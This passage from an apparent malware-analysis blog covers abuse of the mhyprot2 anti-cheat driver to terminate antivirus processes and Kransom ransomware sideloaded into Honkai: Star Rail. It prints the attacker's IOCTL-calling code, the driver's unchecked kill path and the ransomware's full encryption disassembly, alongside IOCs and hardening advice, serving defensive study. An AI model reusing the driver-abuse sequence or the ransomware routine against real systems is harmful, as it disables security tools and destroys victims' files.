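<p>The unit arithmetic behind the interval can be checked in isolation. This is a small sketch, assuming the documented <code>KeDelayExecutionThread</code> convention of 100-nanosecond units with negative values denoting relative time; the helper names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* One millisecond expressed in 100-nanosecond units. */
#define HNS_PER_MS 10000LL

/* Builds a relative (negative) interval from a delay in milliseconds. */
int64_t relative_interval_from_ms(int32_t ms)
{
    return -HNS_PER_MS * ms;
}

/* Converts a relative interval back to milliseconds. */
int64_t interval_to_ms(int64_t interval)
{
    return -interval / HNS_PER_MS;
}
</code></pre>
<p>With an argument of 100, as passed by <code>MhyChecksumForever</code>, the interval is -1,000,000 units of 100 ns, which is one tenth of a second.</p>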
<p>The <code>MhyChecksumForever</code> thread itself is started by <code>MhyCreateChecksumThread</code>, which calls <code>PsCreateSystemThread</code>.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__int64 <span class="hljs-title">MhyCreateChecksumThread</span><span class="hljs-params">()</span>
</span>{
    __int64 v1; <span class="hljs-comment">// [rsp+40h] [rbp-48h]</span>
    __int64 v2; <span class="hljs-comment">// [rsp+48h] [rbp-40h]</span>
    <span class="hljs-keyword">int</span> v3; <span class="hljs-comment">// [rsp+50h] [rbp-38h]</span>
    __int64 v4; <span class="hljs-comment">// [rsp+58h] [rbp-30h]</span>
    __int64 v5; <span class="hljs-comment">// [rsp+60h] [rbp-28h]</span>
    <span class="hljs-keyword">int</span> v6; <span class="hljs-comment">// [rsp+68h] [rbp-20h]</span>
    __int128 v7; <span class="hljs-comment">// [rsp+70h] [rbp-18h]</span>
    __int64 v8; <span class="hljs-comment">// [rsp+90h] [rbp+8h]</span>

    _InterlockedExchange(&amp;dword_14000A6E8, <span class="hljs-number">0</span>);
    v3 = <span class="hljs-number">48</span>;
    v4 = <span class="hljs-number">0</span>i64;
    v6 = <span class="hljs-number">512</span>;
    v5 = <span class="hljs-number">0</span>i64;
    v8 = <span class="hljs-number">0</span>i64;
    _mm_storeu_si128((__m128i*)&amp;v7,(__m128i)<span class="hljs-number">0</span>i64);
    PsCreateSystemThread(
        (PHANDLE)&amp;v8,
        <span class="hljs-number">0</span>,
        (POBJECT_ATTRIBUTES)&amp;v3,
        <span class="hljs-number">0</span>i64,
        (PCLIENT_ID)&amp;v1,
        (PKSTART_ROUTINE)MhyChecksumForever,
        <span class="hljs-number">0</span>i64);
    <span class="hljs-keyword">return</span> PsLookupThreadByThreadId(v2, &amp;gChecksumThreadHandle);
}
</code></pre>
<h3 id="heading-process-termination">Process Termination</h3>
<p>The process termination functionality in mhyprot2 is implemented through a specific IOCTL (Input/Output Control) handler. This feature allows the anti-cheat system to terminate processes, which can be used to stop cheat tools or compromised game instances.</p>
<pre><code class="lang-c">PAGE:FFFFF800188CD0F9 cmp ebx, <span class="hljs-number">81034000</span>h    <span class="hljs-comment">// Compare the IOCTL code with 0x81034000</span>
PAGE:FFFFF800188CD0FF jz <span class="hljs-keyword">short</span> loc_FFFFF800188CD16C  <span class="hljs-comment">// Jump if equal</span>

PAGE:FFFFF800188CD16C loc_FFFFF800188CD16C:  ; CODE XREF: sub_FFFFF800188CD000+FF↑j
PAGE:FFFFF800188CD16C mov rax, [rsp+<span class="hljs-number">30</span>h]    <span class="hljs-comment">// Load pointer to input buffer</span>
PAGE:FFFFF800188CD171 mov ecx, [rax]        <span class="hljs-comment">// Load process ID from input buffer</span>
PAGE:FFFFF800188CD173 call sub_FFFFF800188C36A8  <span class="hljs-comment">// Call process termination function</span>
PAGE:FFFFF800188CD178 <span class="hljs-keyword">and</span> dword ptr [rbp+<span class="hljs-number">1</span>D0h+arg_20], <span class="hljs-number">0</span>
</code></pre>
<p>This code segment compares the provided IOCTL code with <code>0x81034000</code>. If they match, it jumps to the handler for this specific IOCTL. The handler loads the process ID from the input buffer and calls a subroutine (<code>sub_FFFFF800188C36A8</code>) to handle the process termination.</p>
<p><code>sub_FFFFF800188C36A8</code>, in the <code>.text</code> segment, first checks whether the provided process ID (<code>ecx</code>) is non-zero. If the process ID is zero, it jumps to the return statement, effectively ending the function. Beyond that, the routine performs no further checks, such as whether the caller has the right to terminate the specified process.</p>
<pre><code class="lang-c">.text:FFFFF800188C36B0 sub_FFFFF800188C36B0 proc near
.text:FFFFF800188C36B0
.text:FFFFF800188C36B0 var_38          = qword ptr <span class="hljs-number">-38</span>h
.text:FFFFF800188C36B0 var_30          = byte ptr <span class="hljs-number">-30</span>h
.text:FFFFF800188C36B0 var_28          = qword ptr <span class="hljs-number">-28</span>h
.text:FFFFF800188C36B0 var_18          = byte ptr <span class="hljs-number">-18</span>h
.text:FFFFF800188C36B0 arg_0           = qword ptr  <span class="hljs-number">8</span>
.text:FFFFF800188C36B0 Object          = qword ptr  <span class="hljs-number">10</span>h
.text:FFFFF800188C36B0 Handle          = qword ptr  <span class="hljs-number">18</span>h
.text:FFFFF800188C36B0 arg_18          = qword ptr  <span class="hljs-number">20</span>h
.text:FFFFF800188C36B0
.text:FFFFF800188C36B0 ; __unwind { <span class="hljs-comment">// __C_specific_handler</span>
.text:FFFFF800188C36B0 test ecx, ecx   <span class="hljs-comment">// Check if process ID is non-null</span>
.text:FFFFF800188C36B2 jz locret_FFFFF800188C3779  ; If null, <span class="hljs-keyword">return</span>
</code></pre>
<p>The actual process termination is performed using the <code>ZwTerminateProcess</code> function.</p>
<pre><code class="lang-c">.text:FFFFF800188C3733 loc_FFFFF800188C3733:
.text:FFFFF800188C3735 mov rcx, [rsp+<span class="hljs-number">58</span>h+Handle]  <span class="hljs-comment">// Load process handle</span>
.text:FFFFF800188C373A call cs:ZwTerminateProcess <span class="hljs-comment">// Call ZwTerminateProcess</span>
</code></pre>
<p>We can leverage the lack of checks here with a specially crafted request, using the specific IOCTL code and a target process ID. Since this IOCTL handler has a payload encryption measure, attackers would need to encrypt the payload.</p>
<p>This is exactly the same method detailed in the Trend Micro report, with the threat actor opening a handle to the <code>mhyprot2</code> device <em>using the NtOpenFile</em> function.</p>
<pre><code class="lang-cpp">ConsoleWindow = GetConsoleWindow();
ShowWindow(ConsoleWindow,<span class="hljs-number">0</span>);
v4 = <span class="hljs-number">0</span>;
<span class="hljs-keyword">if</span> (!sub_1331000())
{
    <span class="hljs-built_in">memset</span>(Dst, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(Dst));
    wcscpy_s(Dst, <span class="hljs-number">0x100</span>u, <span class="hljs-string">L"\\Device\\"</span>);
    wcscat_s(Dst, <span class="hljs-number">0x100</span>u, mhyprot2);
    <span class="hljs-built_in">memset</span>(&amp;ServiceStatus.dwCurrentState,<span class="hljs-number">0</span>,<span class="hljs-number">24</span>);
    ServiceStatus.dwCurrentState = <span class="hljs-number">24</span>;
    v13 = <span class="hljs-number">2</span> * wcslen(Dst);
    v12 = v13;
    BytesReturned = Dst;
    ServiceStatus.dwWin32ExitCode = &amp;v12;
    v5 = NtOpenFile(&amp;Handle, <span class="hljs-number">0xC0100000</span>, &amp;ServiceStatus.dwCurrentState, &amp;IoStatusBlock, <span class="hljs-number">0</span>, <span class="hljs-number">3u</span>);
}
</code></pre>
<p>Afterwards, it appears to scan for common processes related to antivirus or endpoint detection suites. The list of targeted processes is then passed to <code>mhyprot2</code> through the <code>DeviceIoControl</code> function with control code <code>0x81034000</code>, which instructs the driver to terminate each listed process, along with all of its threads, using the <code>ZwTerminateProcess</code> function.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// DeviceIoControl function</span>
    sub_1333979(v7);
<span class="hljs-keyword">if</span>(DeviceIoControl(Handle_to_myprot2, <span class="hljs-number">0x81034000</span>, &amp;InBuffer, <span class="hljs-number">0xC</span>u, &amp;OutBuffer, <span class="hljs-number">0xC</span>u, &amp;BytesReturned, <span class="hljs-number">0</span>))

<span class="hljs-comment">// The mhyprot2.sys case function</span>
<span class="hljs-keyword">case</span> <span class="hljs-number">0x81034000</span>:
    sub_1400036A8(*v34);
    LODWORD(a5) = <span class="hljs-number">0</span>;

<span class="hljs-keyword">if</span> (ProcessId)
{
    ProcessHandle = <span class="hljs-number">0</span>i64;
    Object = <span class="hljs-number">0</span>i64;
    v1 = PsLookupProcessByProcessId(ProcessId,&amp;Object) &gt;= <span class="hljs-number">0</span>;
    <span class="hljs-keyword">if</span>(Object)
    {
        <span class="hljs-keyword">if</span>(ObOpenObjectByPointer(Object,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>i64,<span class="hljs-number">0</span>,<span class="hljs-number">0</span>i64,<span class="hljs-number">0</span>,&amp;ProcessHandle))
        {
            <span class="hljs-keyword">if</span>(v1)
                ObDereferenceObject(Object);
        }
        <span class="hljs-keyword">else</span>

<span class="hljs-comment">// ZwTerminateProcess inside 0x81034000, which terminates a process and all of its threads</span>
        {
            ZwTerminateProcess(ProcessHandle,<span class="hljs-number">0</span>);
            ZwClose(ProcessHandle);
            <span class="hljs-keyword">if</span>(v1 &amp;&amp; Object)
                ObDereferenceObject(Object);
        }
    }
}
</code></pre>
<p>Indicators of Compromise (IOC)</p>
<ul>
<li><p>avg.msi <code>274685C591E96CB1F9CAE91EC8E7073F3A4CB113</code></p>
</li>
<li><p>avg.exe <code>D4FFD891B9FC1AE212489ABBA43D76E2D58E6782</code></p>
</li>
<li><p>svchost.exe <code>F47D9EC9C2515761E2BC40287B299420A86AF6AB</code></p>
</li>
<li><p>logon.bat <code>1ED1174E6E5545AAA081A480156485156B9D3A13</code></p>
</li>
<li><p>HelpPane.exe <code>2CF9376B057E187B9F465BDAF1C50FDBA9BA66E6</code></p>
</li>
<li><p>kill_svc.exe <code>ccb219be156551464a2b91dfc5cddaf0c3e8321f</code></p>
</li>
<li><p>b.bat <code>7617511adda7cb03f317f0df61624b5ecbffcd87</code></p>
</li>
</ul>
<p>Vulnerable Driver (BYOVD)</p>
<ul>
<li>mhyprot2.sys <code>0466E90BF0E83B776CA8716E01D35A8A2E5F96D3</code></li>
</ul>
<p>To address the IOCTL vulnerability in mhyprot2's process termination functionality, several security measures should be implemented as recommended by Microsoft. When defining new IOCTL codes, it's crucial to specify a <code>FunctionCode</code> value that is equal to or greater than <code>0x800</code>. Additionally, always specify a <code>RequiredAccess</code> value, as this allows the I/O manager to prevent IOCTL calls from users with insufficient access rights. It's important to avoid defining IOCTL codes that allow callers to read or write nonspecific areas of kernel memory.</p>
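<p>To relate these recommendations to the control code seen earlier, an IOCTL value can be split into its fields. The sketch below assumes the standard <code>CTL_CODE</code> bit layout (device type in bits 31 to 16, required access in bits 15 to 14, function code in bits 13 to 2, transfer method in bits 1 to 0); <code>ioctl_fields</code> and <code>decode_ioctl</code> are hypothetical names.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* The four fields packed into a 32-bit I/O control code. */
typedef struct ioctl_fields {
    uint32_t device_type;  /* bits 31..16 */
    uint32_t access;       /* bits 15..14: 0 = any, 1 = read, 2 = write */
    uint32_t function;     /* bits 13..2 */
    uint32_t method;       /* bits 1..0: 0 = buffered */
} ioctl_fields;

/* Splits a control code according to the CTL_CODE layout. */
ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = code &gt;&gt; 16;
    f.access      = (code &gt;&gt; 14) &amp; 0x3;
    f.function    = (code &gt;&gt; 2) &amp; 0xFFF;
    f.method      = code &amp; 0x3;
    return f;
}
</code></pre>
<p>Under this layout <code>0x81034000</code> decodes to device type <code>0x8103</code>, read access, buffered transfer, and function code 0, which is below the <code>0x800</code> threshold mentioned above.</p>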
<p>In the driver's dispatch routines, it's essential to test the entire 32-bit value when examining received IOCTL codes. For enhanced security, drivers can utilize <code>IoValidateDeviceIoControlAccess</code> to perform stricter access checking dynamically, beyond what is specified by the RequiredAccess value in the IOCTL definition.</p>
<p>Buffer validation is a critical aspect of secure IOCTL processing. Never read or write more data than the buffer pointed to by <code>Irp-&gt;AssociatedIrp.SystemBuffer</code> can contain. Always check <code>Parameters.DeviceIoControl.InputBufferLength</code> or <code>Parameters.DeviceIoControl.OutputBufferLength</code> in the <code>IO_STACK_LOCATION</code> structure to determine buffer limits. For added security, always zero driver-allocated buffers that will contain data intended for the application that originated the IOCTL request. This precaution prevents accidental copying of sensitive data to the application.</p>
<p>For <code>METHOD_IN_DIRECT</code> and <code>METHOD_OUT_DIRECT</code> transfers, additional checks are necessary. It's important to check for a <code>NULL</code> return value from <code>MmGetSystemAddressForMdlSafe</code>, which indicates that mapping failed or that a zero-length buffer was supplied. For <code>METHOD_NEITHER</code> transfers, follow the specific rules provided in the "Using Neither Buffered Nor Direct I/O" documentation.</p>
<p>To further enhance security, consider applying explicit security descriptors when the driver is installed. In an INF file, security descriptors are described by the "Security" entry in the AddReg section. The security descriptor should be defined using the Security Descriptor Definition Language (SDDL), which includes specifications for the owner SID, group SID, discretionary access control list (DACL), and system access control list (SACL).</p>
<p>When creating a named device object, drivers can control the security settings of specific objects by using the <code>IoCreateDeviceSecure</code> function. This function allows the application of a security descriptor to the device object using a subset of the full SDDL that is appropriate for device objects. The purpose of applying specific security descriptors to device objects is to ensure that appropriate security checks are performed whenever an application attempts to access the device itself.</p>
<p>For devices that do not support a name structure, it's important to set the <code>FILE_DEVICE_SECURE_OPEN</code> bit in the device characteristics field. This ensures that the I/O manager performs a full security check on the device object. Failing to set this bit correctly is a common bug in drivers and can allow inappropriate access to the device.</p>
<h1 id="heading-honkai-star-rail-dll-sideloading-kransom-ransomware">Honkai : Star Rail DLL Sideloading (Kransom Ransomware)</h1>
<p>In September 2024, ANY.RUN discovered a threat actor using an altered install of Honkai Star Rail to perform a DLL sideloading attack. It starts with <code>StarRail.exe</code>, which is a binary signed by COGNOSPHERE PTE LTD (a subsidiary of HoYoverse and MiHoYo). The game itself needs admin privileges to run, as do most games, especially those with kernel-level anticheats.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1725818181116/22d14c2d-9edf-4d44-baf5-c8f60446ba97.png" alt class="image--center mx-auto" /></p>
<p>We can see how Honkai Star Rail was susceptible to DLL sideloading by examining the binary using dumpbin.exe from Visual Studio 2022 with the <code>C++ Profiling Tools</code> package enabled.</p>
<pre><code class="lang-c">C:\Program Files\Microsoft Visual Studio\<span class="hljs-number">2022</span>\Community\VC\Tools\MSVC\<span class="hljs-number">14.41</span><span class="hljs-number">.34120</span>\bin\Hostx86\x86&gt;dumpbin.exe /imports C:\Users\user\Desktop\test\StarRail.<span class="hljs-function">exe
<span class="hljs-title">Microsoft</span> <span class="hljs-params">(R)</span> COFF/PE Dumper Version 14.41.34120.0
<span class="hljs-title">Copyright</span> <span class="hljs-params">(C)</span> Microsoft Corporation.  All rights reserved.


Dump of file C:\Users\user\Desktop\test\StarRail.exe

File Type: EXECUTABLE IMAGE
LINK : warning LNK4078: multiple '.ace' sections found with different <span class="hljs-title">attributes</span> <span class="hljs-params">(E0000020)</span>

  Section contains the following imports:

    StarRailBase.dll
             1400A6AC1 Import Address Table
             1400A6AF9 Import Name Table
                     0 time date stamp
                     0 Index of first forwarder reference

                             Ordinal     1

  Summary

        3000 .ace
       A3000 .ace</span>
</code></pre>
<p>This output suggests that <code>StarRail.exe</code> is a relatively simple executable that relies on <code>StarRailBase.dll</code> for most of its functionality. The use of ordinal imports and the presence of <code>.ace</code> sections (which are not standard in typical Windows executables) indicate this might be a custom or protected executable format. ACE probably refers to Anti-Cheat Expert.</p>
<p>Microsoft describes how Windows programs typically search for DLLs in its official documentation on <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order">dynamic-link library search order</a>, which states that...</p>
<blockquote>
<p>If safe DLL search mode is enabled, then the search order is as follows:</p>
<ol>
<li><p>DLL Redirection.</p>
</li>
<li><p>API sets.</p>
</li>
<li><p>SxS manifest redirection.</p>
</li>
<li><p>Loaded-module list.</p>
</li>
<li><p>Known DLLs.</p>
</li>
<li><p><strong>Windows 11, version 21H2 (10.0; Build 22000), and later</strong>. The package dependency graph of the process. This is the application's package plus any dependencies specified as <code>&lt;PackageDependency&gt;</code> in the <code>&lt;Dependencies&gt;</code> section of the application's package manifest. Dependencies are searched in the order they appear in the manifest.</p>
</li>
<li><p>The folder from which the application loaded.</p>
</li>
<li><p>The system folder. Use the <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya"><strong>GetSystemDirectory</strong></a> function to retrieve the path of this folder.</p>
</li>
<li><p>The 16-bit system folder. There's no function that obtains the path of this folder, but it is searched.</p>
</li>
<li><p>The Windows folder. Use the <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya"><strong>GetWindowsDirectory</strong></a> function to get the path of this folder.</p>
</li>
<li><p>The current folder.</p>
</li>
<li><p>The directories that are listed in the <code>PATH</code> environment variable. This doesn't include the per-application path specified by the <strong>App Paths</strong> registry key. The <strong>App Paths</strong> key isn't used when computing the DLL search path.</p>
</li>
</ol>
</blockquote>
<p>Safe DLL Search Mode was introduced as a security feature starting with <strong>Windows XP Service Pack 1</strong> and <strong>Windows Server 2003</strong>. This feature is designed to prevent <strong>DLL hijacking</strong> by altering the search order for DLLs. Specifically, it prioritizes system directories (like <code>System32</code>) over the current working directory, thus making it more difficult for attackers to place malicious DLLs in easy-to-access directories.</p>
<p>Before Safe DLL Search Mode, Windows would search the current working directory earlier, which made it easier for attackers to exploit DLL hijacking vulnerabilities. The introduction of Safe DLL Search Mode greatly reduced this risk by switching the order in which directories are searched, providing protection against this type of attack.</p>
<p>While this reduces the risk, it does not eliminate all vulnerabilities, especially if an attacker gains access to directories that are still part of the search order, like the application directory. This is where <code>StarRailBase.dll</code> comes into play, as the DLL is located in the same directory as the game.</p>
<p>The threat actor seems to have provided a mirror of Honkai (weird, because usually they target paid games through cracks, not free-to-play games) and replaced <code>StarRailBase.dll</code> with a malicious version. Note that the game does load and execute this DLL, but the game itself then fails to launch and returns an error saying it could not find the DLL.</p>
<p>The malware's entry point is an exported function named "K". This function is likely called by the game when it attempts to load the legitimate DLL. This function sets up the stack, initializes the file search with the user's directory, and then jumps to the main encryption routine.</p>
<pre><code class="lang-c"><span class="hljs-keyword">public</span> K
K proc near
sub rsp, <span class="hljs-number">28</span>h      <span class="hljs-comment">// Allocate 40 bytes on the stack</span>
lea rcx, aCUsers  <span class="hljs-comment">// Load effective address of "C:\Users" string into rcx</span>
call sub_18000113C  <span class="hljs-comment">// Call function to search for files</span>
add rsp, <span class="hljs-number">28</span>h      <span class="hljs-comment">// Clean up the stack</span>
jmp sub_18000102C   <span class="hljs-comment">// Jump to another function (likely for file encryption)</span>
K endp
</code></pre>
<p>The malware searches for files in the user's directory using Windows API functions. It starts in the user's AppData folder and recursively searches for all files.</p>
<pre><code class="lang-c">sub_18000113C proc near
    <span class="hljs-comment">// Function prologue and stack setup</span>
    mov [rsp<span class="hljs-number">-8</span>+arg_0], rbx
    mov [rsp<span class="hljs-number">-8</span>+arg_8], rdi
    push rbp
    lea rbp, [rsp<span class="hljs-number">-280</span>h]
    sub rsp, <span class="hljs-number">380</span>h
    mov rdi, rcx  ; <span class="hljs-function">Store the input <span class="hljs-title">parameter</span> <span class="hljs-params">(likely the search path)</span>

    <span class="hljs-comment">// Get the user's AppData folder path</span>
    <span class="hljs-keyword">xor</span> r9d, r9d        </span>; dwFlags = <span class="hljs-number">0</span>
    lea rax, [rsp+<span class="hljs-number">148</span>h+String2]
    mov [rsp+<span class="hljs-number">148</span>h+pszPath], rax  ; pszPath = buffer <span class="hljs-keyword">for</span> path
    <span class="hljs-keyword">xor</span> r8d, r8d        ; hToken = <span class="hljs-literal">NULL</span>
    <span class="hljs-keyword">xor</span> ecx, ecx        ; hwnd = <span class="hljs-literal">NULL</span>
    lea edx, [r9+<span class="hljs-number">1</span>Ah]   ; csidl = <span class="hljs-number">0x1A</span> (CSIDL_APPDATA)
    call cs:SHGetFolderPathA

    <span class="hljs-comment">// Construct search path by appending "\*" to user path</span>
    lea rdx, asc_180002084  ; <span class="hljs-string">"\\*"</span>
    lea rcx, [rbp+<span class="hljs-number">280</span>h+String1]  ; lpString1 = user path
    call cs:lstrcatA  ; Append <span class="hljs-string">"\\*"</span> to user path

    <span class="hljs-comment">// Start file search</span>
    lea rdx, [rsp+<span class="hljs-number">380</span>h+FindFileData]  ; lpFindFileData
    lea rcx, [rbp+<span class="hljs-number">280</span>h+String1]  ; lpFileName = search path
    call cs:FindFirstFileA

    mov rbx, rax  ; Store file handle

    <span class="hljs-comment">// Check if file handle is valid</span>
    cmp rax, <span class="hljs-number">0F</span>FFFFFFFFFFFFFFFh
    jz <span class="hljs-keyword">short</span> loc_18000121F  ; Jump to end <span class="hljs-keyword">if</span> invalid handle
</code></pre>
<p>This function uses <code>SHGetFolderPathA</code> to get the user's AppData folder, then uses <code>FindFirstFileA</code> and <code>FindNextFileA</code> to iterate through all files. For each file found, the malware opens it, reads its content, encrypts it, and writes it back to disk.</p>
<p>The encryption is a simple XOR operation with the key 0xAA. While not cryptographically secure, it's enough to render files unreadable.</p>
<pre><code class="lang-c">sub_18000128C proc near
    mov [rsp<span class="hljs-number">-8</span>+arg_0], rbx
    push rbp
    push rsi
    push rdi
    push r14
    push r15
    lea rbp, [rsp<span class="hljs-number">-10050</span>h]
    mov eax, <span class="hljs-number">10150</span>h
    call __alloca_probe
    sub rsp, rax
    mov rsi, rcx  <span class="hljs-comment">// Store filename pointer</span>

    <span class="hljs-comment">// Check if file already has .k extension</span>
    call cs:lstrlenA
    cmp eax, <span class="hljs-number">2</span>
    jl <span class="hljs-keyword">short</span> loc_1800012CF
    cdqe
    cmp byte ptr [rax+rsi<span class="hljs-number">-2</span>], <span class="hljs-number">2</span>Eh ; <span class="hljs-string">'.'</span>
    jnz <span class="hljs-keyword">short</span> loc_1800012CF
    cmp byte ptr [rax+rsi<span class="hljs-number">-1</span>], <span class="hljs-number">6B</span>h ; <span class="hljs-string">'k'</span>
    jz loc_1800013E2  <span class="hljs-comment">// Skip if already encrypted</span>

loc_1800012CF:
    <span class="hljs-comment">// Open the file</span>
    <span class="hljs-keyword">and</span> [rsp+<span class="hljs-number">10170</span>h+var_10140], <span class="hljs-number">0</span>
    <span class="hljs-keyword">xor</span> r9d, r9d  ; lpSecurityAttributes = <span class="hljs-literal">NULL</span>
    mov [rsp+<span class="hljs-number">10170</span>h+dwFlagsAndAttributes], <span class="hljs-number">80</span>h  ; FILE_ATTRIBUTE_NORMAL
    mov edx, <span class="hljs-number">0</span>C0000000h  ; GENERIC_READ | GENERIC_WRITE
    mov rcx, rsi  ; lpFileName
    mov [rsp+<span class="hljs-number">10170</span>h+dwCreationDisposition], <span class="hljs-number">3</span>  ; OPEN_EXISTING
    lea r8d, [r9+<span class="hljs-number">1</span>]  ; dwShareMode = FILE_SHARE_READ
    call cs:CreateFileA

    mov r14, rax  ; Store file handle
    cmp rax, <span class="hljs-number">0F</span>FFFFFFFFFFFFFFFh
    jz loc_1800013E2  ; Jump <span class="hljs-keyword">if</span> file open failed

    <span class="hljs-comment">// Initialize encryption loop variables</span>
    <span class="hljs-keyword">and</span> dword ptr [rbp+<span class="hljs-number">10070</span>h+liDistanceToMove], <span class="hljs-number">0</span>
    <span class="hljs-keyword">xor</span> eax, eax
    mov dword ptr [rbp+<span class="hljs-number">10070</span>h+liDistanceToMove+<span class="hljs-number">4</span>], eax
    <span class="hljs-keyword">xor</span> r15d, r15d
    mov rbx, qword ptr [rbp+<span class="hljs-number">10070</span>h+liDistanceToMove]

loc_180001320:  <span class="hljs-comment">// Start of encryption loop</span>
    <span class="hljs-comment">// Read file content</span>
    <span class="hljs-keyword">and</span> qword ptr [rsp+<span class="hljs-number">10170</span>h+dwCreationDisposition], <span class="hljs-number">0</span>
    lea r9, [rbp+<span class="hljs-number">10070</span>h+NumberOfBytesRead]  
    mov r8d, <span class="hljs-number">10000</span>h  
    lea rdx, [rbp+<span class="hljs-number">10070</span>h+Buffer]  
    mov rcx, r14  <span class="hljs-comment">// hFile</span>
    call cs:ReadFile

    test eax, eax
    jz <span class="hljs-keyword">short</span> loc_1800013AB  <span class="hljs-comment">// Jump if read failed</span>
    mov eax, [rbp+<span class="hljs-number">10070</span>h+NumberOfBytesRead]
    test eax, eax
    jz <span class="hljs-keyword">short</span> loc_1800013AB  <span class="hljs-comment">// Jump if no bytes read</span>

    <span class="hljs-comment">// Prepare for encryption</span>
    mov edi, <span class="hljs-number">80000</span>h
    lea rcx, [rbp+<span class="hljs-number">10070</span>h+Buffer]
    sub rdi, r15
    cmp rax, rdi
    cmovb rdi, rax
    mov rdx, rdi
    call sub_180001400  <span class="hljs-comment">// Call encryption function (XOR)</span>

    <span class="hljs-comment">// Set file pointer back</span>
    mov rdx, rbx  
    mov rcx, r14  
    <span class="hljs-keyword">xor</span> r9d, r9d  
    <span class="hljs-keyword">xor</span> r8d, r8d  
    call cs:SetFilePointerEx

    <span class="hljs-comment">// Write encrypted content back to file</span>
    <span class="hljs-keyword">and</span> qword ptr [rsp+<span class="hljs-number">10170</span>h+dwCreationDisposition], <span class="hljs-number">0</span>
    lea r9, [rbp+<span class="hljs-number">10070</span>h+NumberOfBytesWritten]  
    mov r8d, edi
    lea rdx, [rbp+<span class="hljs-number">10070</span>h+Buffer]
    mov rcx, r14 
    call cs:WriteFile

    <span class="hljs-comment">// Update loop variables and continue if not finished</span>
    add rbx, rdi
    add r15, rdi
    cmp r15, <span class="hljs-number">80000</span>h
    jb loc_180001320

loc_1800013AB:  <span class="hljs-comment">// Cleanup and rename file</span>
    mov rcx, r14  
    call cs:CloseHandle

    <span class="hljs-comment">// Rename file (add .k extension)</span>
    mov rdx, rsi  <span class="hljs-comment">// lpString2 (original filename)</span>
    lea rcx, [rsp+<span class="hljs-number">10170</span>h+String1]  <span class="hljs-comment">// lpString1 (buffer for new name)</span>
    call cs:lstrcpyA

    lea rdx, aK_0  <span class="hljs-comment">// ".k"</span>
    lea rcx, [rsp+<span class="hljs-number">10170</span>h+String1]  <span class="hljs-comment">// lpString1 (buffer with new name)</span>
    call cs:lstrcatA

    lea rdx, [rsp+<span class="hljs-number">10170</span>h+String1]  <span class="hljs-comment">// lpNewFileName</span>
    mov rcx, rsi  <span class="hljs-comment">// lpExistingFileName</span>
    call cs:MoveFileA

loc_1800013E2:  <span class="hljs-comment">// Function epilogue</span>
    mov rbx, [rsp+<span class="hljs-number">10170</span>h+arg_0]
    add rsp, <span class="hljs-number">10150</span>h
    pop r15
    pop r14
    pop rdi
    pop rsi
    pop rbp
    retn
sub_18000128C endp

<span class="hljs-comment">// XOR encryption function</span>
sub_180001400 proc near
    test rdx, rdx
    jz <span class="hljs-keyword">short</span> locret_180001411

loc_180001405:
    <span class="hljs-keyword">xor</span> byte ptr [rcx], <span class="hljs-number">0</span>AAh
    inc rcx
    sub rdx, <span class="hljs-number">1</span>
    jnz <span class="hljs-keyword">short</span> loc_180001405

locret_180001411:
    retn
sub_180001400 endp
</code></pre>
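<p>Because XOR with a fixed byte is its own inverse, running the same operation over an encrypted buffer restores the original bytes. The following is a minimal sketch of that idea in portable C, not a recovery tool: the <code>0xAA</code> key and the <code>0x80000</code>-byte bound are read off the listing above (the loop appears to stop once <code>r15</code> reaches that value), while the function and macro names are made up for the example, and it works on an in-memory buffer instead of touching files.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

#define KRANSOM_XOR_KEY   0xAAu      /* key byte used in sub_180001400 */
#define KRANSOM_MAX_BYTES 0x80000u   /* loop bound compared against r15 */

/* XOR the first min(length, KRANSOM_MAX_BYTES) bytes in place and return
   how many bytes were transformed. Calling it twice undoes the first call. */
static size_t kransom_xor(uint8_t *data, size_t length)
{
    size_t limit = length &lt; KRANSOM_MAX_BYTES ? length : KRANSOM_MAX_BYTES;
    for (size_t i = 0; i &lt; limit; i++) {
        data[i] ^= KRANSOM_XOR_KEY;
    }
    return limit;
}

/* Mirrors the check at the top of sub_18000128C: does the name end in ".k"? */
static int has_k_extension(const char *name)
{
    size_t len = strlen(name);
    return len &gt;= 2 &amp;&amp; name[len - 2] == '.' &amp;&amp; name[len - 1] == 'k';
}
</code></pre>
<p>Assuming the bound really is per file, only the first 512 KiB of a large file would be altered, so the rest of its contents stays in the clear.</p>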
<p>At the end, the malware includes a hardcoded message.</p>
<pre><code class="lang-c">RansomMessage:
    db <span class="hljs-string">"I believe you encountered some problems. "</span>
    db <span class="hljs-string">"Email to to hoyoverse for solutions."</span>
</code></pre>
<p>It's clear from the simple encryption method and the hardcoded message, which shows no motive other than being disruptive or the finale of a prank, that this isn't really a serious piece of ransomware. Yet the fact that HoYoverse didn't think to put safeguards in place to check the validity of the DLL being loaded is interesting.</p>
<p>For Windows 8 and later (or Windows 7 with KB2533623 installed), the <code>LoadLibraryEx</code> function offers <a target="_blank" href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa">enhanced control over DLL loading</a>. This native Windows API function provides several new flags designed to improve security and specificity in DLL loading.</p>
<p>Some notable flags include:</p>
<ul>
<li><p><code>LOAD_LIBRARY_SEARCH_APPLICATION_DIR</code>: Searches the application's directory.</p>
</li>
<li><p><code>LOAD_LIBRARY_SEARCH_SYSTEM32</code>: Searches the System32 directory.</p>
</li>
<li><p><code>LOAD_LIBRARY_SEARCH_USER_DIRS</code>: Searches directories added with <code>AddDllDirectory</code> or <code>SetDllDirectory</code>.</p>
</li>
<li><p><code>LOAD_LIBRARY_REQUIRE_SIGNED_TARGET</code>: Ensures the loaded library is digitally signed.</p>
</li>
